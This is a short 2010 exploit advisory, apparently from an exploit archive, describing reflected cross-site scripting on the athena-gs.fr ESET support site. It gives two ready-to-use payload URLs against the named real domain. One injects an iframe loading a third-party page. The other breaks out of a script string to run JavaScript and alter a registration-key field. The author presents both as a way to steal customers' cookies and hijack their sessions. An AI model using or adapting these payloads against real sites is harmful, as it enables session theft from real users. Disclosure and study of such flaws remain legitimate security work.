Athena-gs.fr suffers from a cross site scripting vulnerabilities.
b13148fc323376c081853afe438b50238f9a68e15568573d2db3dd5ef1119fce
+-----------------------------------------------------------+
| Stupid XSS + "Auth ByPass" athena-gs.fr |
+-----------------------------------------------------------+
| Author : FlUxIuS from Slashon and HandGrep |
| Date : 14/06/2010 |
+-----------------------------------------------------------+
Introduction
=============
Athena Global Services is a support of ESET Antivirus sofware in France.
In this exploit, I just would like show how is simply to use this vulnerability against customers, after bypassing
the authenfication page by a Magic research ^_^'... (Cookies Stealing and Session hijacking for example).
The exploit
===========
[Iframe] : https://www.athena-gs.fr/dexter/reg_keys/index.php?lic2use=%3C/script%3E%3Ciframe%20width=%22100%%22%20height=%22300px%22%20src=%22http://www.bonjourinfirmiere.fr/post/695159180/proposee-par-zedacen%22%3E%3C/iframe%3E
[Javascript] : index.php?lic2use=999%22;%20alert(%22huhu%22);%20theDoc.Register_Key.value=%22488
and so on...
Credits
=======
(fr) http://www.slashon.com/index.php/2010-06-14/crackmefr_athena_global_episode1_la_menace_fantome